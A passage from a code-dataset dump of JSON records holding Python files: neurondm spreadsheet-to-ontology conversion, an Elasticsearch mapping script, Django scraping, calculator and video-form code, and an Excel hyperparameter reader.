rdf.type\n elif header == 'definition':\n return definition\n else:\n header = header.replace(' ', '_')\n return TEMP[header] # FIXME\n\n def mapCell(cell, syns=False):\n search_prefixes = ('UBERON', 'CHEBI', 'PR', 'NCBITaxon', 'NCBIGene', 'ilxtr', 'NIFEXT', 'SAO', 'NLXMOL',\n 'BIRNLEX',)\n\n if ':' in cell and ' ' not in cell:\n log.debug(cell)\n if 'http' in cell:\n if cell.startswith('http'):\n t = OntTerm(iri=cell)\n else:\n return None, None # garbage with http inline\n else:\n t = OntTerm(cell, exclude_prefix=('FMA',)) # FIXME need better error message in ontquery\n\n return t.u, t.label\n\n result = [r for r in sgv.findByTerm(cell, searchSynonyms=syns, prefix=search_prefixes)\n if not r['deprecated']]\n #printD(cell, result)\n if not result:\n log.debug(f'{cell}')\n maybe = list(query(label=cell, exclude_prefix=('FMA',)))\n if maybe:\n qr = maybe[0]\n return qr.OntTerm.u, qr.label\n elif not syns:\n return mapCell(cell, syns=True)\n else:\n return None, None\n elif len(result) > 1:\n #printD('WARNING', result)\n result = select_by_curie_rank(result)\n else:\n result = result[0]\n\n return rdflib.URIRef(result['iri']), result['labels'][0]\n\n def lower_check(label, cell):\n return label not in cell and label.lower() not in cell.lower() # have to handle comma sep case\n\n lnlu = {v:k for k, v in LogicalPhenotype.local_names.items()}\n def convert_cell(cell_or_comma_sep):\n #printD('CONVERTING', cell_or_comma_sep)\n for cell_w_junk in cell_or_comma_sep.split(','): # XXX WARNING need a way to alter people to this\n cell = cell_w_junk.strip()\n if cell.startswith('(OR') or cell.startswith('(AND'):\n start, *middle, end = cell.split('\" \"')\n OPoperator, first = start.split(' \"')\n operator = OPoperator[1:]\n operator = lnlu[operator]\n last, CP = end.rsplit('\"')\n iris, labels = [], []\n for term in (first, *middle, last):\n iri, label = mapCell(term)\n if label is None:\n label = cell_or_comma_sep\n iris.append(iri)\n labels.append(label)\n\n yield (operator, *iris), tuple(labels)\n\n else:\n iri, label = mapCell(cell)\n if label is None:\n yield iri, cell_or_comma_sep # FIXME need a way to handle this that doesn't break things?\n else:\n yield iri, label\n\n config = Config('cut-roundtrip')\n skip = 'alignment label',\n headers, *rows = values\n errors = []\n new = []\n release = []\n for i, neuron_row in enumerate(rows):\n id = None\n label_neuron = None\n definition_neuron = None\n synonyms_neuron = None\n current_neuron = None\n phenotypes = []\n do_release = False\n predicate_notes = {}\n object_notes = {}\n other_notes = {}\n wat = {}\n for j, (header, cell) in enumerate(zip(headers, neuron_row)):\n notes = list(process_note(get_note(i + 1, j, notes_index))) # + 1 since headers is removed\n if notes and not header.startswith('has'):\n _predicate = convert_other(header)\n if cell:\n _object = rdflib.Literal(cell) # FIXME curies etc.\n else:\n _object = rdf.nil\n other_notes[_predicate, _object] = notes\n\n if header == 'curie':\n id = OntId(cell).u if cell else None\n continue\n elif header == 'label':\n label_neuron = cell\n if cell in existing:\n current_neuron = existing[cell]\n elif cell:\n # TODO\n new.append(cell)\n else:\n raise ValueError(cell) # wat\n continue\n elif header == 'Status':\n # TODO\n if cell == 'Yes':\n do_release = True\n elif cell == 'Maybe':\n pass\n elif cell == 'Not yet':\n pass\n elif cell == 'Delete':\n pass\n else:\n pass\n\n continue\n elif header == 'PMID':\n # TODO\n continue\n elif header == 'Other reference':\n # TODO\n continue\n elif header == 'Other label':\n # TODO\n continue\n elif header == 'definition':\n continue # FIXME single space differences between the spreadsheet and the source\n\n if cell:\n definition_neuron = rdflib.Literal(cell)\n\n continue\n\n elif header == 'synonyms':\n if cell:\n synonyms_neuron = [rdflib.Literal(s.strip())\n # FIXME bare comma is extremely dangerous\n for s in cell.split(',')]\n\n continue\n elif header in skip:\n continue\n\n objects = []\n if cell:\n predicate = convert_header(header)\n if predicate is None:\n log.debug(f'{(header, cell, notes)}')\n\n for object, label in convert_cell(cell):\n if isinstance(label, tuple): # LogicalPhenotype case\n _err = []\n for l in label:\n if lower_check(l, cell):\n _err.append((cell, label))\n if _err:\n errors.extend(_err)\n else:\n objects.append(object)\n elif lower_check(label, cell):\n errors.append((cell, label))\n elif str(id) == object:\n errors.append((header, cell, object, label))\n object = None\n else:\n objects.append(object)\n\n if notes:\n # FIXME this is a hack to only attach to the last value\n # since we can't distinguish at the moment\n wat[predicate, object] = notes\n if object is not None:\n # object aka iri can be none if we don't find anything\n object_notes[object] = notes\n else:\n predicate_notes[predicate] = notes\n # FIXME it might also be simpler in some cases\n # to have this be object_notes[object] = notes\n # because we are much less likely to have the same\n # phenotype appear attached to the different dimensions\n\n # FIXME comma sep is weak here because the\n # reference is technically ambiguous\n # might be an argument for the denormalized form ...\n # or perhaps having another sheet for cases like that\n\n else:\n continue\n\n if predicate and objects:\n for object in objects: # FIXME has layer location phenotype\n if isinstance(object, tuple):\n op, *rest = object\n pes = (Phenotype(r, predicate) for r in rest) # FIXME nonhomogenous phenotypes\n phenotypes.append(LogicalPhenotype(op, *pes))\n elif object:\n phenotypes.append(Phenotype(object, predicate))\n else:\n errors.append((object, predicate, cell))\n elif objects:\n errors.append((header, objects))\n else:\n errors.append((header, cell))\n # translate header -> predicate\n # translate cell value to ontology id\n\n if current_neuron and phenotypes:\n # TODO merge current with changes\n # or maybe we just replace since all the phenotypes should be there?\n log.debug(phenotypes)\n if id is not None:\n log.debug(f'{(id, bool(id))}')\n\n elif label_neuron:\n id = make_cut_id(label_neuron)\n\n if id not in expect_pes:\n log.error(f'{id!r} not in cuts!?')\n continue\n\n if expect_pes[id] != len(phenotypes):\n log.error(f'{id!r} failed roundtrip {len(phenotypes)} != {expect_pes[id]}')\n continue\n\n neuron = NeuronCUT(*phenotypes, id_=id, label=label_neuron,\n override=bool(id) or bool(label_neuron))\n neuron.adopt_meta(current_neuron)\n # FIXME occasionally this will error?!\n else:\n continue # FIXME this polutes everything ???\n fn = fixname(label_neuron)\n if not phenotypes and i: # i skips header\n errors.append((i, neuron_row)) # TODO special review for phenos but not current\n phenotypes = Phenotype('TEMP:phenotype/' + fn),\n\n neuron = NeuronCUT(*phenotypes,\n id_=make_cut_id(label_neuron),\n label=label_neuron, override=True)\n\n # update the meta if there were any changes\n if definition_neuron is not None:\n neuron.definition = definition_neuron\n\n if synonyms_neuron is not None:\n neuron.synonyms = synonyms_neuron\n\n try:\n neuron.batchAnnotateByObject(object_notes)\n neuron.batchAnnotate(other_notes)\n except AttributeError as e:\n #embed()\n log.exception(e) #'something very strage has happened\\n', e)\n pass # FIXME FIXME FIXME\n\n #neuron.batchAnnotateByPredicate(predicate_notes) # TODO\n # FIXME doesn't quite work in this context, but there are other\n # cases where annotations to the general modality are still desireable\n # FIXME there may be no predicate? if the object fails to match?\n\n if do_release:\n release.append(neuron)\n\n return config, errors, new, release\n\n\nclass Cuts(Sheet):\n name = 'neurons-cut'\n\n\nclass CutsV1(Cuts):\n sheet_name = 'CUT V1.0'\n fetch_grid = True\n\n\ndef main():\n #from neurondm.models.cuts import main as cuts_main\n #cuts_config, *_ = cuts_main()\n from IPython import embed\n from neurondm.compiled.common_usage_types import config as cuts_config\n cuts_neurons = cuts_config.neurons()\n expect_pes = {n.id_:len(n.pes) for n in cuts_neurons}\n\n sheet = CutsV1()\n config, errors, new, release = sheet_to_neurons(sheet.values, sheet.notes_index, expect_pes)\n #sheet.show_notes()\n config.write_python()\n config.write()\n #config = Config(config.name)\n #config.load_existing() # FIXME this is a hack to get get a load_graph\n from neurondm import Config, NeuronCUT\n release_config = Config('cut-release')\n [NeuronCUT(*n, id_=n.id_, label=n.origLabel, override=True).adopt_meta(n) for n in release]\n release_config.write_python()\n release_config.write()\n from neurondm.models.cuts import export_for_review\n review_rows = export_for_review(config, [], [], [], filename='cut-rt-test.csv', with_curies=True)\n from pyontutils.utils import byCol\n valuesC = byCol(sheet.values[1:],\n header=[v.replace(' ', '_') for v in sheet.values[0]],\n to_index=['label'])\n reviewC = byCol(review_rows[1:], header=[v.replace(' ', '_') for v in review_rows[0]], to_index=['label'])\n def grow(r):\n log.debug(r)\n # TODO implement on the object to allow joining on an index?\n # man this would be easier with sql >_< probably pandas too\n # but so many dependencies ... also diffing issues etc\n return valuesC.searchIndex('label', r.label)\n\n def key(field_value):\n field, value = field_value\n try:\n return valuesC.header._fields.index(field) # TODO warn on field mismatch\n except ValueError as e:\n print('ERROR!!!!!!!!!!!', field, value)\n return None\n\n def replace(r, *cols):\n \"\"\" replace and reorder \"\"\"\n # FIXME _super_ inefficient\n vrow = grow(r)\n for field, value in sorted(zip(r._fields, r), key=key):\n if field in cols:\n value = getattr(vrow, field)\n\n yield '' if value is None else value # completely overwrite the sheet\n\n rows = [list(replace(r, 'Status', 'definition', 'synonyms', 'PMID')) for r in reviewC]\n #resp = update_sheet_values('neurons-cut', 'Roundtrip', rows)\n embed()\n\nif __name__ == '__main__':\n main()\n", "sub_path": "neurondm/neurondm/sheets.py", "file_name": "sheets.py", "file_ext": "py", "file_size_in_byte": 16233, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pyontutils.namespaces.ilxtr.literatureCitation", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pyontutils.namespaces.ilxtr", "line_number": 46, "usage_type": "name"}, {"api_name": "hyputils.hypothesis.idFromShareLink", "line_number": 48, "usage_type": "call"}, {"api_name": "rdflib.URIRef", "line_number": 51, "usage_type": "call"}, {"api_name": "hyputils.hypothesis.shareLinkFromId", "line_number": 51, "usage_type": "call"}, {"api_name": "rdflib.URIRef", "line_number": 53, "usage_type": "call"}, {"api_name": "rdflib.URIRef", "line_number": 55, "usage_type": "call"}, {"api_name": "rdflib.Literal", "line_number": 57, "usage_type": "call"}, {"api_name": "pyontutils.scigraph.Vocabulary", "line_number": 62, "usage_type": "call"}, {"api_name": "neurondm.Config", "line_number": 63, "usage_type": "call"}, {"api_name": "ontquery.OntQuery", "line_number": 65, "usage_type": "call"}, {"api_name": "ontquery.plugin.get", "line_number": 65, "usage_type": "call"}, {"api_name": "ontquery.plugin", "line_number": 65, "usage_type": "attribute"}, {"api_name": "neurondm.core.OntTerm", "line_number": 65, "usage_type": "name"}, {"api_name": "pyontutils.namespaces.ilxtr", "line_number": 71, "usage_type": "name"}, {"api_name": "pyontutils.closed_namespaces.rdfs.label", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pyontutils.closed_namespaces.rdfs", "line_number": 77, "usage_type": "name"}, {"api_name": "pyontutils.closed_namespaces.rdf.type", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pyontutils.closed_namespaces.rdf", "line_number": 79, "usage_type": "name"}, {"api_name": "pyontutils.namespaces.definition", "line_number": 81, "usage_type": "name"}, {"api_name": "pyontutils.namespaces.TEMP", "line_number": 84, "usage_type": "name"}, {"api_name": "neurondm.core.log.debug", "line_number": 91, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 91, "usage_type": "name"}, {"api_name": "neurondm.core.OntTerm", "line_number": 94, "usage_type": "call"}, {"api_name": "neurondm.core.OntTerm", "line_number": 98, "usage_type": "call"}, {"api_name": "neurondm.core.log.debug", "line_number": 106, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 106, "usage_type": "name"}, {"api_name": "rdflib.URIRef", "line_number": 121, "usage_type": "call"}, {"api_name": "neurondm.LogicalPhenotype.local_names.items", "line_number": 126, "usage_type": "call"}, {"api_name": "neurondm.LogicalPhenotype.local_names", "line_number": 126, "usage_type": "attribute"}, {"api_name": "neurondm.LogicalPhenotype", "line_number": 126, "usage_type": "name"}, {"api_name": "neurondm.Config", "line_number": 154, "usage_type": "call"}, {"api_name": "pyontutils.sheets.get_note", "line_number": 173, "usage_type": "call"}, {"api_name": "rdflib.Literal", "line_number": 177, "usage_type": "call"}, {"api_name": "pyontutils.closed_namespaces.rdf.nil", "line_number": 179, "usage_type": "attribute"}, {"api_name": "pyontutils.closed_namespaces.rdf", "line_number": 179, "usage_type": "name"}, {"api_name": "neurondm.core.OntId", "line_number": 183, "usage_type": "call"}, {"api_name": "rdflib.Literal", "line_number": 222, "usage_type": "call"}, {"api_name": "rdflib.Literal", "line_number": 228, "usage_type": "call"}, {"api_name": "neurondm.core.log.debug", "line_number": 240, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 240, "usage_type": "name"}, {"api_name": "neurondm.Phenotype", "line_number": 286, "usage_type": "call"}, {"api_name": "neurondm.LogicalPhenotype", "line_number": 287, "usage_type": "call"}, {"api_name": "neurondm.Phenotype", "line_number": 289, "usage_type": "call"}, {"api_name": "neurondm.core.log.debug", "line_number": 302, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 302, "usage_type": "name"}, {"api_name": "neurondm.core.log.debug", "line_number": 304, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 304, "usage_type": "name"}, {"api_name": "neurondm.models.cuts.make_cut_id", "line_number": 307, "usage_type": "call"}, {"api_name": "neurondm.core.log.error", "line_number": 310, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 310, "usage_type": "name"}, {"api_name": "neurondm.core.log.error", "line_number": 314, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 314, "usage_type": "name"}, {"api_name": "neurondm.NeuronCUT", "line_number": 317, "usage_type": "call"}, {"api_name": "neurondm.models.cuts.fixname", "line_number": 323, "usage_type": "call"}, {"api_name": "neurondm.Phenotype", "line_number": 326, "usage_type": "call"}, {"api_name": "neurondm.NeuronCUT", "line_number": 328, "usage_type": "call"}, {"api_name": "neurondm.models.cuts.make_cut_id", "line_number": 329, "usage_type": "call"}, {"api_name": "neurondm.core.log.exception", "line_number": 344, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 344, "usage_type": "name"}, {"api_name": "pyontutils.sheets.Sheet", "line_number": 358, "usage_type": "name"}, {"api_name": "neurondm.compiled.common_usage_types.config.neurons", "line_number": 372, "usage_type": "call"}, {"api_name": "neurondm.compiled.common_usage_types.config", "line_number": 372, "usage_type": "name"}, {"api_name": "neurondm.Config", "line_number": 383, "usage_type": "call"}, {"api_name": "neurondm.NeuronCUT", "line_number": 384, "usage_type": "call"}, {"api_name": "neurondm.models.cuts.export_for_review", "line_number": 388, "usage_type": "call"}, {"api_name": "pyontutils.utils.byCol", "line_number": 390, "usage_type": "call"}, {"api_name": "pyontutils.utils.byCol", "line_number": 393, "usage_type": "call"}, {"api_name": "neurondm.core.log.debug", "line_number": 395, "usage_type": "call"}, {"api_name": "neurondm.core.log", "line_number": 395, "usage_type": "name"}, {"api_name": "IPython.embed", "line_number": 421, "usage_type": "call"}]} +{"seq_id": "538531912", "text": "# -*- coding:UTF-8 -*-\nimport json\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import scan\n\nindex_info = {\n 'settings':{\n 'number_of_shards':5,\n 'number_of_replicas':0,\n },\n 'mappings':{\n 'group':{\n 'properties':{\n 'task_name':{\n 'type':'string',\n 'index': 'not_analyzed'\n },\n 'state':{\n 'type':'string',\n 'index': 'not_analyzed'\n },\n 'status':{\n 'type':'long'\n },\n 'submit_date':{\n 'type':'string',\n 'index': 'not_analyzed'\n }\n }\n }\n }\n }\n\nes = Elasticsearch('219.224.135.93')\n\nes.indices.create(index='group_result', body=index_info, ignore=400)\n\n", "sub_path": "user_portrait/group_result_mappings.py", "file_name": "group_result_mappings.py", "file_ext": "py", "file_size_in_byte": 922, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "elasticsearch.Elasticsearch", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "258601220", "text": "from django.shortcuts import render\nfrom .models import Analysis\n# Create your views here.\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nr = requests.get(\n 'https://www.n11.com/telefon-ve-aksesuarlari')\nsoup = BeautifulSoup(r.content, \"lxml\")\ntitle = soup.find_all(\"h3\", class_=\"productName\")\ntits = []\n\nfor tit in title:\n tits.append(tit.text)\n\n\ndef analysis(request):\n context = {'tits': tits}\n return render(request, 'analysis.html', context)\n\n\ndef basabas(request):\n context = {}\n return render(request, 'basabas.html', context)\n", "sub_path": "analysis/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 553, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 10, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 20, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "553204166", "text": "from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import redirect, render\nfrom django.template import loader\nfrom django.http import HttpResponse\nfrom django import template\nfrom os.path import join, dirname\nfrom dotenv import load_dotenv\nimport os, math\n\ncur_path = dirname(__file__)\nenv_path = cur_path[:cur_path.rfind(os.path.sep)] \ndotenv_path = join(env_path, '.env')\nload_dotenv(dotenv_path)\nprint(\"### \" + dotenv_path + \" ##\")\n\ncontext = {}\n\ncontext['TOKEN_APR_MIN'] = float(os.environ.get('TOKEN_APR_MIN'))\ncontext['TOKEN_APR_MAX'] = float(os.environ.get('TOKEN_APR_MAX'))\ncontext['GAS_FEE_MIN'] = float(os.environ.get('GAS_FEE_MIN'))\ncontext['GAS_FEE_MAX'] = float(os.environ.get('GAS_FEE_MAX'))\ncontext['TIME_HORIZON_DAYS_MIN'] = int(os.environ.get('TIME_HORIZON_DAYS_MIN'))\ncontext['TIME_HORIZON_DAYS_MAX'] = int(os.environ.get('TIME_HORIZON_DAYS_MAX'))\ncontext['TOKEN_START_COUNT_MIN'] = float(os.environ.get('TOKEN_START_COUNT_MIN'))\ncontext['TOKEN_START_COUNT_MAX'] = float(os.environ.get('TOKEN_START_COUNT_MAX'))\ncontext['TOKEN_START_PRICE_MIN'] = float(os.environ.get('TOKEN_START_PRICE_MIN'))\ncontext['TOKEN_START_PRICE_MAX'] = float(os.environ.get('TOKEN_START_PRICE_MAX'))\ncontext['TOKEN_END_PRICE_MIN'] = float(os.environ.get('TOKEN_END_PRICE_MIN'))\ncontext['TOKEN_END_PRICE_MAX'] = float(os.environ.get('TOKEN_END_PRICE_MAX'))\n\n\ndef index(request):\n global dotenv_path\n\n if \"ta\" in request.GET :\n context['TOKEN_APR_FROM'] = request.GET[\"ta\"]\n else:\n context['TOKEN_APR_FROM'] = (context['TOKEN_APR_MIN'] + context['TOKEN_APR_MAX']) / 2\n\n if \"gf\" in request.GET :\n context['GAS_FEE_FROM'] = request.GET[\"gf\"]\n else:\n context['GAS_FEE_FROM'] = (context['GAS_FEE_MIN'] + context['GAS_FEE_MAX']) / 2\n\n if \"th\" in request.GET :\n context['TIME_HORIZON_DAYS_FROM'] = request.GET[\"th\"]\n else:\n context['TIME_HORIZON_DAYS_FROM'] = (context['TIME_HORIZON_DAYS_MIN'] + context['TIME_HORIZON_DAYS_MAX']) // 2\n\n if \"tsc\" in request.GET :\n context['TOKEN_START_COUNT_FROM'] = request.GET[\"tsc\"]\n else:\n context['TOKEN_START_COUNT_FROM'] = (context['TOKEN_START_COUNT_MIN'] + context['TOKEN_START_COUNT_MAX']) / 2\n\n if \"tsp\" in request.GET :\n context['TOKEN_START_PRICE_FROM'] = request.GET[\"tsp\"]\n else:\n context['TOKEN_START_PRICE_FROM'] = (context['TOKEN_START_PRICE_MIN'] + context['TOKEN_START_PRICE_MAX']) / 2\n\n if \"tep\" in request.GET :\n context['TOKEN_END_PRICE_FROM'] = request.GET[\"tep\"]\n else:\n context['TOKEN_END_PRICE_FROM'] = (context['TOKEN_END_PRICE_MIN'] + context['TOKEN_END_PRICE_MAX']) / 2\n\n \n html_template = loader.get_template( 'index.html' )\n return HttpResponse(html_template.render(context, request))\n\ndef calc(request):\n print(request.GET['ta'])\n TOKEN_APR = float(request.GET['ta'])\n print(TOKEN_APR)\n GAS_FEE = float(request.GET['gf'])\n print(GAS_FEE)\n TIME_HORIZON_DAYS = int(request.GET['th'])\n print(TIME_HORIZON_DAYS)\n TOKEN_START_COUNT = float(request.GET['tsc'])\n TOKEN_START_PRICE = float(request.GET['tsp'])\n TOKEN_END_PRICE = float(request.GET['tep'])\n\n max_profit, max_deposit_frequency, max_token_count = (0, 0, 0)\n profits = []\n profits.append(0)\n for deposit_frequency in range(1, TIME_HORIZON_DAYS + 1):\n token_count = TOKEN_START_COUNT\n fee_balance = 0\n token_start_balance = token_count * TOKEN_START_PRICE\n \n token_count = token_count * ((1 + TOKEN_APR * deposit_frequency/100/TIME_HORIZON_DAYS)**(TIME_HORIZON_DAYS // deposit_frequency)) * (1 + TOKEN_APR * (TIME_HORIZON_DAYS % deposit_frequency)/100/TIME_HORIZON_DAYS)\n fee_balance = GAS_FEE * math.ceil(TIME_HORIZON_DAYS / deposit_frequency)\n token_end_balance = token_count * TOKEN_END_PRICE\n profit = token_end_balance - fee_balance - token_start_balance\n profits.append(str(profit))\n\n if deposit_frequency == 1:\n max_profit = profit\n max_deposit_frequency = deposit_frequency\n max_token_count = token_count\n elif profit > max_profit :\n max_profit = profit\n max_deposit_frequency = deposit_frequency\n max_token_count = token_count\n\n \n profits[0] = str(max_deposit_frequency) + \"_\" + str(max_token_count)\n return HttpResponse(\",\".join(profits))\n #\n", "sub_path": "calculator/calculator/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4416, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.dirname", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "dotenv.load_dotenv", "line_number": 13, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 18, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 19, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 20, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 21, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 22, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 23, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 24, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 26, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 27, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 28, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 29, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 29, "usage_type": "attribute"}, {"api_name": "django.template.loader.get_template", "line_number": 66, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 66, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 67, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 90, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "55966972", "text": "\"\"\"\n# Read an Excel file and get hyperparameters\n\nFrom https://openpyxl.readthedocs.io/en/stable/pandas.html\n\nAssumptions:\n - You are running it from scratch. It will read all of the hyperparameters\n - Manually set wb.Hyperparameters.Done = True when done (ideally automatic)\n\n\"\"\"\nfrom openpyxl import load_workbook\nfrom itertools import islice\nimport pandas as pd\n\n\ndef read_hyperparameters(xlsx_path, worksheet: str = 'Hyperparameters'):\n \"\"\"\n Read the Hyperparameters from a spreadsheet\n - Taken from https://openpyxl.readthedocs.io/en/stable/pandas.html\n\n :param xlsx_path: str - path to xlsx worksheet\n :param worksheet: str - name of Hyperparameter worksheet\n :return: pd.DataFrame - Pandas dataframe of info\n \"\"\"\n\n wb = load_workbook(filename=xlsx_path)\n ws = wb[worksheet]\n wb.close()\n\n # From Documentation\n data = ws.values\n # First row is column names\n cols = next(data)[1:]\n # Extract Data Fields\n data = list(data)\n # Index is first column of data\n idx = [r[0] for r in data]\n data = (islice(r, 1, None) for r in data)\n df = pd.DataFrame(data, index=idx, columns=cols)\n\n return df\n\n\ndef write_results(results, xlsx_path, worksheet: str = 'Results'):\n \"\"\"\n Write results\n :param results: dict - {'Trial': 1, 'Train Acc': 0.883, 'Train Loss': 0.546, 'Valid Acc':, 'Valid Loss':,\n 'Test Acc':, 'Test Loss':}\n :param xlsx_path:\n :param worksheet:\n :return:\n \"\"\"\n # Open and Read\n wb = load_workbook(filename=xlsx_path)\n ws = wb[worksheet]\n\n # Append Row\n trial = results.get('Trial', None)\n tr_acc = results.get('Train Acc', None)\n tr_loss = results.get('Train Loss', None)\n v_acc = results.get('Valid Acc', None)\n v_loss = results.get('Valid Loss', None)\n t_acc = results.get('Test Acc', None)\n t_loss = results.get('Test Loss', None)\n\n ws.append((trial, tr_acc, tr_loss, v_acc, v_loss, t_acc, t_loss))\n\n # Save and Close\n wb.save(filename=xlsx_path)\n wb.close()\n\n\nif __name__ == '__main__':\n xlsx_path = '../$ scrap_data/test.xlsx'\n df = read_hyperparameters(xlsx_path)\n\n results = {'Trial': 1, 'Train Acc': 0.883, 'Train Loss': 0.546, 'Valid Acc': 0.797, 'Valid Loss': 0.721,\n 'Test Acc': 0.657, 'Test Loss': 1.043}\n write_results(results, xlsx_path)\n\n\n\n", "sub_path": "library/training/hyperparameter.py", "file_name": "hyperparameter.py", "file_ext": "py", "file_size_in_byte": 2319, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "openpyxl.load_workbook", "line_number": 26, "usage_type": "call"}, {"api_name": "itertools.islice", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "615942124", "text": "from django import forms\nimport numpy as np\nimport re\n\nVALUES = [\n ('48000', '48000'),\n ('41000', '41000'),\n ]\n\nPLAYBACK = np.arange(0.5, 3, 0.5)\nPLAYBACK = zip(PLAYBACK.tolist(), PLAYBACK.tolist())\n\n\nclass InputParm(forms.Form):\n frame_rate = forms.IntegerField(widget=forms.Select(choices=VALUES), initial=48000)\n frame_quality = forms.IntegerField(initial=3)\n frame_margin = forms.IntegerField(initial=5)\n playback_speed = forms.FloatField(widget=forms.Select(choices=PLAYBACK), initial=1)\n silent_speed = forms.IntegerField(initial=100)\n silence_threshold = forms.FloatField(initial=0.03)\n\n def __init__(self, *args, **kwargs):\n super(InputParm, self).__init__(*args, **kwargs) # Call to ModelForm constructor\n self.fields['frame_quality'].widget.attrs['min'] = 1\n self.fields['frame_margin'].widget.attrs['min'] = 0\n self.fields['silent_speed'].widget.attrs['min'] = 1\n self.fields['silence_threshold'].widget.attrs['min'] = 0\n\n def clean_frame_quality(self):\n frame_quality = self.cleaned_data['frame_quality']\n if 1 <= frame_quality <= 31:\n return frame_quality\n else:\n raise forms.ValidationError('Frame Quality Value must be in this range (1 to 31)')\n\n def clean_frame_margin(self):\n frame_margin = self.cleaned_data['frame_margin']\n if 0 <= frame_margin <= 120:\n return frame_margin\n else:\n raise forms.ValidationError('Frame Margin Value must be in this range (0 to 120)')\n\n def clean_playback_speed(self):\n playback_speed = self.cleaned_data['playback_speed']\n if 0.5 <= playback_speed <= 2.25:\n return playback_speed\n else:\n raise forms.ValidationError('Playback Speed Value must be in this range (0.5 to 2.25)')\n\n def clean_silent_speed(self):\n silent_speed = self.cleaned_data['silent_speed']\n if 1 <= silent_speed <= 100:\n return silent_speed\n else:\n raise forms.ValidationError('Silent Speed Value must be in this range (1 to 100)')\n\n def clean_silence_threshold(self):\n silence_threshold = self.cleaned_data['silence_threshold']\n if 0 <= silence_threshold <= 1:\n return silence_threshold\n else:\n raise forms.ValidationError('Silence Threshold Value must be in this range (0 to 1)')\n\n\nQUALITY = [\n ('Default', 'Default'),\n ('1080p', '1080p'),\n ('720p', '720p'),\n ('480p', '480p'),\n ('360p', '360p'),\n ('240p', '240p'),\n ('144p', '144p')\n]\n\n\nclass UrlForm(forms.Form):\n paste_URL = forms.URLField(widget=forms.TextInput(attrs={'rows': 1, 'cols': 100}), required=True)\n quality = forms.CharField(widget=forms.Select(choices=QUALITY), initial=\"Default\")\n\n def clean_paste_URL(self):\n pattern = re.compile(r'.+youtube\\.com/watch\\?.+')\n paste_url = self.cleaned_data['paste_URL']\n if pattern.match(paste_url):\n print(paste_url)\n return paste_url\n else:\n raise forms.ValidationError('Please enter a youtube video')\n\n\ndef validate_file_extension(value):\n import os\n from django.core.exceptions import ValidationError\n ext = os.path.splitext(value.name)[1]\n valid_extensions = ['.mp4', '.mov', '.mpeg', '.wmv']\n if not ext.lower() in valid_extensions:\n raise ValidationError('Unsupported file extension.')\n\n\nclass UploadVideoForm(forms.Form):\n title = forms.CharField(max_length=70, required=True, initial=\"VideoShortCuts\")\n file = forms.FileField(required=True, validators=[validate_file_extension])\n\n\nclass SubmitForm(forms.Form):\n origin_video_size = forms.CharField(required=False)\n origin_video_length = forms.CharField(required=False)\n new_video_size 